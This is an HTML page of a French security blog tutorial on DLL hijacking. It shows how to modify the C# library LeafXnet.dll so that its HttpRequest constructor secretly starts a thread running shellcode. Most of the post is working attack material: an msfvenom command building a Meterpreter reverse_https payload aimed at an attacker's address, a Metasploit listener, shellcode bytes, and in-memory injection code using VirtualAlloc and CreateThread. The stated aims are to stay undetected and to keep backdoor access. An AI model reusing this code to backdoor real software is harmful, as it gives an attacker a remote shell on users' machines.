<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us">
<head>
    










    







<script defer language="javascript" type="text/javascript" src="/vozec.fr/js/bundle.min.145453261a7755f5042a854c4213501d215a8fbe34c08d181c40f803f1315e74.js"></script>






    
    <meta http-equiv="content-type" content="text/html; charset=utf-8">

    
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    
    <link rel="icon" href=/images/favicon.png>

    
    





  





  
  
  


<!-- Open Graph image and Twitter Card metadata -->

<title itemprop="name">Vozec&#39;s Blog - Execution de ShellCode grâce au Dll Hidjacking</title>
<meta property="og:title" content=Vozec&#39;s&#32;Blog&#32;-&#32;Execution&#32;de&#32;ShellCode&#32;grâce&#32;au&#32;Dll&#32;Hidjacking />
<meta name="twitter:title" content=Vozec&#39;s&#32;Blog&#32;-&#32;Execution&#32;de&#32;ShellCode&#32;grâce&#32;au&#32;Dll&#32;Hidjacking />
<meta itemprop="name" content=Vozec&#39;s&#32;Blog&#32;-&#32;Execution&#32;de&#32;ShellCode&#32;grâce&#32;au&#32;Dll&#32;Hidjacking />
<meta name="application-name" content=Vozec&#39;s&#32;Blog&#32;-&#32;Execution&#32;de&#32;ShellCode&#32;grâce&#32;au&#32;Dll&#32;Hidjacking />
<meta property="og:site_name" content="" />


<meta name="description" content="Voici comment Détourner une DLL C# Part2" />
<meta itemprop="description" content="Voici comment Détourner une DLL C# Part2" />
<meta property="og:description" content="Voici comment Détourner une DLL C# Part2" />
<meta name="twitter:description" content="Voici comment Détourner une DLL C# Part2" />


<base href="https://vozec.github.io/vozec.fr/posts/pourquoi-vous-devez-securiser-vos-dll-2/" />
<link rel="canonical" href="https://vozec.github.io/vozec.fr/posts/pourquoi-vous-devez-securiser-vos-dll-2/" itemprop="url" />
<meta name="url" content="https://vozec.github.io/vozec.fr/posts/pourquoi-vous-devez-securiser-vos-dll-2/" />
<meta name="twitter:url" content="https://vozec.github.io/vozec.fr/posts/pourquoi-vous-devez-securiser-vos-dll-2/" />
<meta property="og:url" content="https://vozec.github.io/vozec.fr/posts/pourquoi-vous-devez-securiser-vos-dll-2/" />


<meta property="og:updated_time" content="2021-12-05T12:00:00Z" />


<link rel="sitemap" type="application/xml" title="Sitemap" href='https://vozec.github.io/vozec.fr/sitemap.xml' />

<meta name="robots" content="index,follow" />
<meta name="googlebot" content="index,follow" />


<meta name="twitter:site" content="https://twitter.com/Vozec1" />
<meta name="twitter:creator" content="https://twitter.com/Vozec1" />
<meta property="fb:admins" content="" />


<meta name="apple-mobile-web-app-title" content="" />
<meta name="apple-mobile-web-app-capable" content="yes" />
<meta name="apple-mobile-web-app-status-bar-style" content="black" />






<meta name="generator" content="Hugo 0.134.1">


    
    

<link type="text/css" rel="stylesheet" href="/vozec.fr/css/bundle.min.94a339836f89f0d25f31980cb6b0631da21e20af128308747ce44e0525eb16ef.css">


    
    <style>
    body {
        --sidebar-bg-color: #202020;
        --sidebar-img-border-color: #515151;
        --sidebar-p-color: #909090;
        --sidebar-h1-color: #FFF;
        --sidebar-a-color: #FFF;
        --sidebar-socials-color: #FFF;
        --text-color: #222;
        --bkg-color: #FAF9F6;
        --post-title-color: #303030;
        --list-color: #5A5A5A;
        --link-color: #268BD2;
        --date-color: #515151;
        --table-border-color: #E5E5E5;
        --table-stripe-color: #F9F9F9;
        --code-color: #000;
        --code-background-color: #E5E5E5;
        --code-block-color: #FFF;
        --code-block-background-color: #272822;
        --moon-sun-color: #FFF;
        --moon-sun-background-color: #515151;
    }
    body.dark-theme {
        --text-color: #EEE;
        --bkg-color: #121212;
        --post-title-color: #DBE2E9;
        --list-color: #9D9D9D;
        --link-color: #268BD2;
        --date-color: #9A9A9A;
        --table-border-color: #515151;
        --table-stripe-color: #202020;
        --code-color: #FFF;
        --code-background-color: #515151;
        --code-block-color: #FFF;
        --code-block-background-color: #272822;
    }
    body {
        background-color: var(--bkg-color);
    }
</style>

</head>

    <body class="dark-theme">
        <div class="wrapper">
            <aside class="sidebar">
    <div class="container sidebar-sticky">
        <div class="light-dark" align="right">
    <button class="btn-light-dark" title="Toggle light/dark mode">
        <svg class="moon" xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" viewBox="0 0 16 16">
            <path fill="currentColor" d="M6 .278a.768.768 0 0 1 .08.858a7.208 7.208 0 0 0-.878 3.46c0 4.021 3.278 7.277 7.318 7.277c.527 0 1.04-.055 1.533-.16a.787.787 0 0 1 .81.316a.733.733 0 0 1-.031.893A8.349 8.349 0 0 1 8.344 16C3.734 16 0 12.286 0 7.71C0 4.266 2.114 1.312 5.124.06A.752.752 0 0 1 6 .278z"/>
        </svg>
        <svg class="sun" xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" viewBox="0 0 16 16">
            <path fill="currentColor" d="M8 12a4 4 0 1 0 0-8a4 4 0 0 0 0 8zM8 0a.5.5 0 0 1 .5.5v2a.5.5 0 0 1-1 0v-2A.5.5 0 0 1 8 0zm0 13a.5.5 0 0 1 .5.5v2a.5.5 0 0 1-1 0v-2A.5.5 0 0 1 8 13zm8-5a.5.5 0 0 1-.5.5h-2a.5.5 0 0 1 0-1h2a.5.5 0 0 1 .5.5zM3 8a.5.5 0 0 1-.5.5h-2a.5.5 0 0 1 0-1h2A.5.5 0 0 1 3 8zm10.657-5.657a.5.5 0 0 1 0 .707l-1.414 1.415a.5.5 0 1 1-.707-.708l1.414-1.414a.5.5 0 0 1 .707 0zm-9.193 9.193a.5.5 0 0 1 0 .707L3.05 13.657a.5.5 0 0 1-.707-.707l1.414-1.414a.5.5 0 0 1 .707 0zm9.193 2.121a.5.5 0 0 1-.707 0l-1.414-1.414a.5.5 0 0 1 .707-.707l1.414 1.414a.5.5 0 0 1 0 .707zM4.464 4.465a.5.5 0 0 1-.707 0L2.343 3.05a.5.5 0 1 1 .707-.707l1.414 1.414a.5.5 0 0 1 0 .708z"/>
        </svg>
    </button>
</div>

        <div class="sidebar-about">
    <h1 class="brand">
        
            <a href="https://vozec.github.io/vozec.fr/">
                <img src="https://avatars.githubusercontent.com/u/61807609?v=4" alt="brand image">
            </a>
        
        
            <a href="https://vozec.github.io/vozec.fr/">
                <h1>Vozec&#39;s Blog</h1>
            </a>
        
    </h1>
    <p class="lead">
    A student passionate about cybersecurity
    </p>
</div>

        <nav>
    <ul class="sidebar-nav">

        
        
        
        
            

            
                
                
                    <li class="heading">
                        <a href="/about/">About</a>
                    </li>
                    
                
            
                
                
            
                
                
            
                
                
            
                
                
            
                
                
            
                
                
            
            
                
                
                        
                
                        
                
                        
                
            
                
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
            
        
        
            

            
                
                
            
                
                
            
                
                
            
                
                
            
                
                
            
                
                
            
                
                
                    <li class="heading">
                        <a href="/writeups/">Writeups</a>
                    </li>
                    
                
            
            
                
                
                        
                
                        
                
                        
                
            
                
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
            
        
        
            

            
                
                
            
                
                
            
                
                
            
                
                
            
                
                
                    <li class="heading">
                        <a href="/researchs/">Researchs</a>
                    </li>
                    
                
            
                
                
            
                
                
            
            
                
                
                        
                
                        
                
                        
                
            
                
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
            
        
        
            

            
                
                
            
                
                
            
                
                
            
                
                
            
                
                
            
                
                
                    <li class="heading">
                        <a href="/rsa/">1/ Crypto RSA</a>
                    </li>
                    
                
            
                
                
            
            
                
                
                        
                
                        
                
                        
                
            
                
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
            
        
        
            

            
                
                
            
                
                
                    <li class="heading">
                        <a href="/aes/">2/ Crypto AES</a>
                    </li>
                    
                
            
                
                
            
                
                
            
                
                
            
                
                
            
                
                
            
            
                
                
                        
                
                        
                
                        
                
            
                
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
            
        
        
            

            
                
                
            
                
                
            
                
                
                    <li class="heading">
                        <a href="/other/">3/ Crypto Other</a>
                    </li>
                    
                
            
                
                
            
                
                
            
                
                
            
                
                
            
            
                
                
                        
                
                        
                
                        
                
            
                
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
            
        

    </ul>
</nav>

        
    <a target="_blank" class="social" title="GitHub" href="https://github.com/Vozec">
        <svg xmlns="http://www.w3.org/2000/svg" width="1.2em" height="1.2em" viewBox="-2 -2 24 24">
            <path fill="currentColor" d="M18.88 1.099C18.147.366 17.265 0 16.233 0H3.746C2.714 0 1.832.366 1.099 1.099C.366 1.832 0 2.714 0 3.746v12.487c0 1.032.366 1.914 1.099 2.647c.733.733 1.615 1.099 2.647 1.099H6.66c.19 0 .333-.007.429-.02a.504.504 0 0 0 .286-.169c.095-.1.143-.245.143-.435l-.007-.885c-.004-.564-.006-1.01-.006-1.34l-.3.052c-.19.035-.43.05-.721.046a5.555 5.555 0 0 1-.904-.091a2.026 2.026 0 0 1-.872-.39a1.651 1.651 0 0 1-.572-.8l-.13-.3a3.25 3.25 0 0 0-.41-.663c-.186-.243-.375-.407-.566-.494l-.09-.065a.956.956 0 0 1-.17-.156a.723.723 0 0 1-.117-.182c-.026-.061-.004-.111.065-.15c.07-.04.195-.059.378-.059l.26.04c.173.034.388.138.643.311a2.1 2.1 0 0 1 .631.677c.2.355.44.626.722.813c.282.186.566.28.852.28c.286 0 .533-.022.742-.065a2.59 2.59 0 0 0 .585-.196c.078-.58.29-1.028.637-1.34a8.907 8.907 0 0 1-1.333-.234a5.314 5.314 0 0 1-1.223-.507a3.5 3.5 0 0 1-1.047-.872c-.277-.347-.505-.802-.683-1.365c-.177-.564-.266-1.215-.266-1.952c0-1.049.342-1.942 1.027-2.68c-.32-.788-.29-1.673.091-2.652c.252-.079.625-.02 1.119.175c.494.195.856.362 1.086.5c.23.14.414.257.553.352a9.233 9.233 0 0 1 2.497-.338c.859 0 1.691.113 2.498.338l.494-.312a6.997 6.997 0 0 1 1.197-.572c.46-.174.81-.221 1.054-.143c.39.98.424 1.864.103 2.653c.685.737 1.028 1.63 1.028 2.68c0 .737-.089 1.39-.267 1.957c-.177.568-.407 1.023-.689 1.366a3.65 3.65 0 0 1-1.053.865c-.42.234-.828.403-1.223.507a8.9 8.9 0 0 1-1.333.235c.45.39.676 1.005.676 1.846v3.11c0 .147.021.266.065.357a.36.36 0 0 0 .208.189c.096.034.18.056.254.064c.074.01.18.013.318.013h2.914c1.032 0 1.914-.366 2.647-1.099c.732-.732 1.099-1.615 1.099-2.647V3.746c0-1.032-.367-1.914-1.1-2.647z"/>
        </svg>
    </a>



    <a target="_blank" class="social" title="LinkedIn" href="https://www.linkedin.com/in/arthur-dlfr/">
        <svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1.2em" viewBox="0 0 448 512">
            <path fill="currentColor" d="M416 32H31.9C14.3 32 0 46.5 0 64.3v383.4C0 465.5 14.3 480 31.9 480H416c17.6 0 32-14.5 32-32.3V64.3c0-17.8-14.4-32.3-32-32.3zM135.4 416H69V202.2h66.5V416zm-33.2-243c-21.3 0-38.5-17.3-38.5-38.5S80.9 96 102.2 96c21.2 0 38.5 17.3 38.5 38.5c0 21.3-17.2 38.5-38.5 38.5zm282.1 243h-66.4V312c0-24.8-.5-56.7-34.5-56.7c-34.6 0-39.9 27-39.9 54.9V416h-66.4V202.2h63.7v29.2h.9c8.9-16.8 30.6-34.5 62.9-34.5c67.2 0 79.7 44.3 79.7 101.9V416z"/>
        </svg>
    </a>


    <a target="_blank" class="social" title="Twitter" href="https://twitter.com/Vozec1">
        <svg xmlns="http://www.w3.org/2000/svg" width="1.2em" height="1.2em" viewBox="0 0 16 16">
            <path fill="currentColor" d="M5.032 14.286c6.037 0 9.34-4.837 9.34-9.032c0-.137 0-.274-.01-.41A6.56 6.56 0 0 0 16 3.2c-.6.256-1.235.425-1.885.5a3.207 3.207 0 0 0 1.443-1.757c-.645.37-1.35.63-2.085.77a3.322 3.322 0 0 0-1.862-.958a3.384 3.384 0 0 0-2.082.334a3.223 3.223 0 0 0-1.442 1.49a3.08 3.08 0 0 0-.208 2.03a9.57 9.57 0 0 1-3.747-.963a9.269 9.269 0 0 1-3.018-2.354a3.086 3.086 0 0 0-.36 2.314c.189.787.68 1.475 1.376 1.924a3.344 3.344 0 0 1-1.49-.398v.04c0 .734.263 1.444.743 2.01a3.3 3.3 0 0 0 1.89 1.102c-.483.128-.99.146-1.482.055a3.19 3.19 0 0 0 1.168 1.577a3.36 3.36 0 0 0 1.9.627A6.732 6.732 0 0 1 0 12.86a9.527 9.527 0 0 0 5.032 1.423"/>
        </svg>
    </a>




    <a target="_blank" class="social" title="Discord" href="vozec">
        <svg xmlns="http://www.w3.org/2000/svg" width="1.2em" height="1.2em" viewBox="0 0 24 24">
            <path fill="currentColor" d="M19.27 5.33C17.94 4.71 16.5 4.26 15 4a.09.09 0 0 0-.07.03c-.18.33-.39.76-.53 1.09a16.09 16.09 0 0 0-4.8 0c-.14-.34-.35-.76-.54-1.09c-.01-.02-.04-.03-.07-.03c-1.5.26-2.93.71-4.27 1.33c-.01 0-.02.01-.03.02c-2.72 4.07-3.47 8.03-3.1 11.95c0 .02.01.04.03.05c1.8 1.32 3.53 2.12 5.24 2.65c.03.01.06 0 .07-.02c.4-.55.76-1.13 1.07-1.74c.02-.04 0-.08-.04-.09c-.57-.22-1.11-.48-1.64-.78c-.04-.02-.04-.08-.01-.11c.11-.08.22-.17.33-.25c.02-.02.05-.02.07-.01c3.44 1.57 7.15 1.57 10.55 0c.02-.01.05-.01.07.01c.11.09.22.17.33.26c.04.03.04.09-.01.11c-.52.31-1.07.56-1.64.78c-.04.01-.05.06-.04.09c.32.61.68 1.19 1.07 1.74c.03.01.06.02.09.01c1.72-.53 3.45-1.33 5.25-2.65c.02-.01.03-.03.03-.05c.44-4.53-.73-8.46-3.1-11.95c-.01-.01-.02-.02-.04-.02zM8.52 14.91c-1.03 0-1.89-.95-1.89-2.12s.84-2.12 1.89-2.12c1.06 0 1.9.96 1.89 2.12c0 1.17-.84 2.12-1.89 2.12zm6.97 0c-1.03 0-1.89-.95-1.89-2.12s.84-2.12 1.89-2.12c1.06 0 1.9.96 1.89 2.12c0 1.17-.83 2.12-1.89 2.12z"/>
        </svg>
    </a>










    <a target="_blank" class="social" title="Email" href="https://www.root-me.org/Vozec">
       <svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1.2em" viewBox="0 0 485.211 485.211">
            <path fill="currentColor" d="M301.393,241.631L464.866,424.56H20.332l163.474-182.928l58.801,51.443L301.393,241.631z M462.174,60.651H23.027 l219.579,192.142L462.174,60.651z M324.225,221.67l160.986,180.151V80.792L324.225,221.67z M0,80.792v321.029L160.972,221.64 L0,80.792z"/>
       </svg>
    </a>


        <p class="footnote">
powered by <a target="_blank" href="https://gohugo.io">Hugo</a> | themed with <a target="_blank" href="https://github.com/lukeorth/poison">poison</a>
    <br>
    &copy; 2025 . All rights reserved.
</p>

  </div>
</aside>

            <main class="content container">
                <div class="post">
  <div class="info">
  <h1 class="post-title">
    <a href="https://vozec.github.io/vozec.fr/posts/pourquoi-vous-devez-securiser-vos-dll-2/">Execution de ShellCode grâce au Dll Hidjacking</a>
  </h1>

  <div class="headline">
    <div>
      
      <time datetime=" 2021-12-05T12:00:00Z" class="post-date">
        December 5, 2021
      </time>
      
      <span> - </span>
      <span class="reading-time">
        
          
        

        <span>5 mins read</span>
      </span>
    </div>

    
    <ul class="tags">
      
      <li class="tag-reverse">
        <a href="https://vozec.github.io/vozec.fr/tags/reverse">reverse</a>
      </li>
      
      <li class="tag-tuto">
        <a href="https://vozec.github.io/vozec.fr/tags/tuto">tuto</a>
      </li>
      
    </ul>
    
  </div>

  
  

  
</div>

  <h2 id="introduction">Introduction</h2>
<p>Nous avons déjà parlé du DLL Hidjacking dans un article précédent. Nous avions détourné la Bibliothèque <em>LeafXnet.dll</em>.
Nous aurions pu utiliser une autre, comme <em>Newtonsoft.Json.dll</em> ou encore <em>Colorful.Console.dll</em> .
Voici le résultat que nous avions la dernière fois :</p>
<p><img src="./img/hijacked.png" alt="Alt text"></p>
<p>Nous récupérions juste les requêtes pour les écrire dans un fichier texte.</p>
<h3 id="petit-rappel">Petit Rappel</h3>
<p>Le Dll Hidjacking consiste à modifier une bibliothèque appelée par un programme et ainsi ajouter du code exécuter.
Ainsi la fonction qui est appelée exécutera ce qu&rsquo;elle est censée faire pour que le programme continue de fonctionner mais elle exécutera des actions en plus.
Voir <a href="http://vozec.fr/articles/pourquoi-vous-devez-s%C3%A9curiser-vos-dll/" target="_blank">mon ancien article ici</a></p>
<h2 id="objectif">Objectif</h2>
<p>Je vais essayé d&rsquo;executer du <code>ShellCode</code> directement dans la mémoire en utilisant des <code>fonction C</code>
On doit donc :</p>
<ul>
<li>Détourner une fonction supposée d&rsquo;être utilisée dans un programme utilisant <code>LeafXnet.dll</code></li>
<li>Créer Notre ShellCode</li>
<li>Coder un script qui execute ce shellCode</li>
<li>Faire en sorte que celui ci soit indetectable</li>
</ul>
<h4 id="etape-1--détournement">Etape 1 : Détournement</h4>
<p>On va utiliser la fonction d&rsquo;initialisation d&rsquo;une requète :</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-C" data-lang="C"><span style="display:flex;"><span>HttpRequest MyRequest <span style="color:#f92672">=</span> new <span style="color:#a6e22e">HttpRequest</span>();
</span></span></code></pre></div><p>Voici la fonction appelée :</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-C" data-lang="C"><span style="display:flex;"><span>public <span style="color:#a6e22e">HttpRequest</span>()
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>        <span style="color:#a6e22e">Init</span>();
</span></span><span style="display:flex;"><span>    }
</span></span></code></pre></div><p>Je créer un booléen défini sur <em>False</em> qui permet de ne lancer qu&rsquo;une seule fois mon payload dans le cas ou le programme créerait plusieurs requètes .</p>
<p>On y ajoute une fonction supplémentaire qui va être appelée avant
<code>Init();</code></p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-C" data-lang="C"><span style="display:flex;"><span>public <span style="color:#66d9ef">static</span> async <span style="color:#66d9ef">void</span> <span style="color:#a6e22e">Request</span>()
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>      Console.<span style="color:#a6e22e">WriteLine</span>(<span style="color:#e6db74">&#34;Hello World&#34;</span>);  
</span></span><span style="display:flex;"><span>    }
</span></span></code></pre></div><p>Et on l&rsquo;appelle dans un Thread en parallèle si le Booléen est sur <em>False</em> :</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-C" data-lang="C"><span style="display:flex;"><span>public <span style="color:#a6e22e">HttpRequest</span>()
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span> (<span style="color:#f92672">!</span>activated) { activated <span style="color:#f92672">=</span> true; Thread thr <span style="color:#f92672">=</span> new <span style="color:#a6e22e">Thread</span>(Request); thr.<span style="color:#a6e22e">Start</span>(); }
</span></span><span style="display:flex;"><span>        <span style="color:#a6e22e">Init</span>();
</span></span><span style="display:flex;"><span>    }
</span></span></code></pre></div><p>Résultat :
<img src="./img/poc.png" alt="Alt text"></p>
<h4 id="etape-2--création-du-shellcode">Etape 2 : Création du ShellCode</h4>
<p>Nous allons utiliser <code>MsfVenom</code> avec ce payload : <em>windows/x64/meterpreter/reverse_https</em> de metasploit.</p>
<p>Comme Ceci :</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-Bash" data-lang="Bash"><span style="display:flex;"><span>msfvenom -p windows/x64/meterpreter/reverse_https LHOST<span style="color:#f92672">=</span>172.31.22.127 LPORT<span style="color:#f92672">=</span><span style="color:#ae81ff">443</span> -f csharp -o shellcode.txt
</span></span></code></pre></div><p>On paramètre un listener :</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-Bash" data-lang="Bash"><span style="display:flex;"><span>use exploit/multi/handler
</span></span><span style="display:flex;"><span>set LPORT <span style="color:#ae81ff">443</span>
</span></span><span style="display:flex;"><span>set LHOST 0.0.0.0
</span></span><span style="display:flex;"><span>set payload windows/x64/meterpreter/reverse_https
</span></span><span style="display:flex;"><span>exploit
</span></span></code></pre></div><p>On a plus qu&rsquo;à attendre une connexion</p>
<h4 id="etape-3--injection-du-shellcode-dans-la-mémoire">Etape 3 : Injection du ShellCode dans la mémoire.</h4>
<p>Retournons sur notre fonction Request() :
On y ajoute le shellCode en byte :</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-C" data-lang="C"><span style="display:flex;"><span>public <span style="color:#66d9ef">static</span> async <span style="color:#66d9ef">void</span> <span style="color:#a6e22e">Request</span>()
</span></span><span style="display:flex;"><span>  {
</span></span><span style="display:flex;"><span>        byte[] buf <span style="color:#f92672">=</span> new byte[<span style="color:#ae81ff">784</span>] {
</span></span><span style="display:flex;"><span>        <span style="color:#ae81ff">0xfc</span>,<span style="color:#ae81ff">0x48</span>,<span style="color:#ae81ff">0x83</span>,<span style="color:#ae81ff">0xe4</span>,<span style="color:#ae81ff">0xf0</span>,<span style="color:#ae81ff">0xe8</span>,<span style="color:#ae81ff">0xcc</span>,<span style="color:#ae81ff">0x48</span>,<span style="color:#ae81ff">0x31</span>,  
</span></span><span style="display:flex;"><span>        <span style="color:#ae81ff">0x85</span>,<span style="color:#ae81ff">0xc0</span>,<span style="color:#ae81ff">0x75</span>,<span style="color:#ae81ff">0xd2</span>[REDACTED],<span style="color:#ae81ff">0x58</span>,<span style="color:#ae81ff">0x6a</span>,<span style="color:#ae81ff">0x00</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#ae81ff">0x49</span>,<span style="color:#ae81ff">0xc7</span>,<span style="color:#ae81ff">0xc2</span>,<span style="color:#ae81ff">0xf0</span>,<span style="color:#ae81ff">0xb5</span>,<span style="color:#ae81ff">0xa2</span>,<span style="color:#ae81ff">0x56</span>,<span style="color:#ae81ff">0xff</span>,<span style="color:#ae81ff">0xd5</span>
</span></span><span style="display:flex;"><span>    };
</span></span><span style="display:flex;"><span>  }
</span></span></code></pre></div><p>On ajoute la fonction <em>VirtualAlloc</em> qui permet d&rsquo;allouer de la mémoire :</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-C" data-lang="C"><span style="display:flex;"><span>[<span style="color:#a6e22e">DllImport</span>(<span style="color:#e6db74">&#34;kernel32&#34;</span>)]
</span></span><span style="display:flex;"><span>public <span style="color:#66d9ef">static</span> <span style="color:#66d9ef">extern</span> IntPtr <span style="color:#a6e22e">VirtualAlloc</span>(
</span></span><span style="display:flex;"><span>      IntPtr lpAddress,
</span></span><span style="display:flex;"><span>      uint dwSize,
</span></span><span style="display:flex;"><span>      uint flAllocationType,
</span></span><span style="display:flex;"><span>      uint flProtect);
</span></span></code></pre></div><p>et on l&rsquo;appelle dans la fonction :</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-C" data-lang="C"><span style="display:flex;"><span>IntPtr addr <span style="color:#f92672">=</span> <span style="color:#a6e22e">VirtualAlloc</span>(IntPtr.Zero, (uint)buf.Length, <span style="color:#ae81ff">0x00001000</span> <span style="color:#f92672">|</span> <span style="color:#ae81ff">0x00002000</span>, <span style="color:#ae81ff">0x40</span>);
</span></span></code></pre></div><p>Puis on copie notre ShellCode dans un Buffer, dans la mémoire allouée précédemment :</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-C" data-lang="C"><span style="display:flex;"><span>Marshal.<span style="color:#a6e22e">Copy</span>(buf, <span style="color:#ae81ff">0</span>, addr, buf.Length);
</span></span></code></pre></div><p>Enfin, on créer un Thread sur l&rsquo;adresse :
<em>(Sans oublier d&rsquo;importer la fonction C CreateThread)</em></p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-C" data-lang="C"><span style="display:flex;"><span>[<span style="color:#a6e22e">DllImport</span>(<span style="color:#e6db74">&#34;kernel32&#34;</span>, CharSet <span style="color:#f92672">=</span> CharSet.Ansi)]
</span></span><span style="display:flex;"><span>       public <span style="color:#66d9ef">static</span> <span style="color:#66d9ef">extern</span> IntPtr <span style="color:#a6e22e">CreateThread</span>(
</span></span><span style="display:flex;"><span>           IntPtr lpThreadAttributes,
</span></span><span style="display:flex;"><span>           uint dwStackSize,
</span></span><span style="display:flex;"><span>           IntPtr lpStartAddress,
</span></span><span style="display:flex;"><span>           IntPtr lpParameter,
</span></span><span style="display:flex;"><span>           uint dwCreationFlags,
</span></span><span style="display:flex;"><span>           IntPtr lpThreadId);
</span></span></code></pre></div><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-C" data-lang="C"><span style="display:flex;"><span>IntPtr <span style="color:#66d9ef">thread</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">CreateThread</span>(IntPtr.Zero, <span style="color:#ae81ff">0</span>, addr, IntPtr.Zero, <span style="color:#ae81ff">0</span>, IntPtr.Zero);
</span></span></code></pre></div><p>Enfin, il faut laisser le processus tourner infiniment. Dans notre scénario le programme ne se ferme pas tout de suite, mais dans cette démonstration, le programme ne fait rien à part créer une requête.
On peut donc ajouter :</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-C" data-lang="C"><span style="display:flex;"><span>Console.<span style="color:#a6e22e">ReadLine</span>();
</span></span></code></pre></div><p>Ou</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-C" data-lang="C"><span style="display:flex;"><span>[<span style="color:#a6e22e">DllImport</span>(<span style="color:#e6db74">&#34;kernel32.dll&#34;</span>, SetLastError <span style="color:#f92672">=</span> true)]
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">static</span> <span style="color:#66d9ef">extern</span> UInt32 <span style="color:#a6e22e">WaitForSingleObject</span>(
</span></span><span style="display:flex;"><span>            IntPtr hHandle,
</span></span><span style="display:flex;"><span>            UInt32 dwMilliseconds);
</span></span></code></pre></div><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-C" data-lang="C"><span style="display:flex;"><span><span style="color:#a6e22e">WaitForSingleObject</span>(<span style="color:#66d9ef">thread</span>, <span style="color:#ae81ff">0xFFFFFFFF</span>);
</span></span></code></pre></div><p>Cela va permettre d&rsquo;attendre infiniment la fin du programme et ainsi nous laisser un accès à la porte dérobée depuis métasploit.</p>
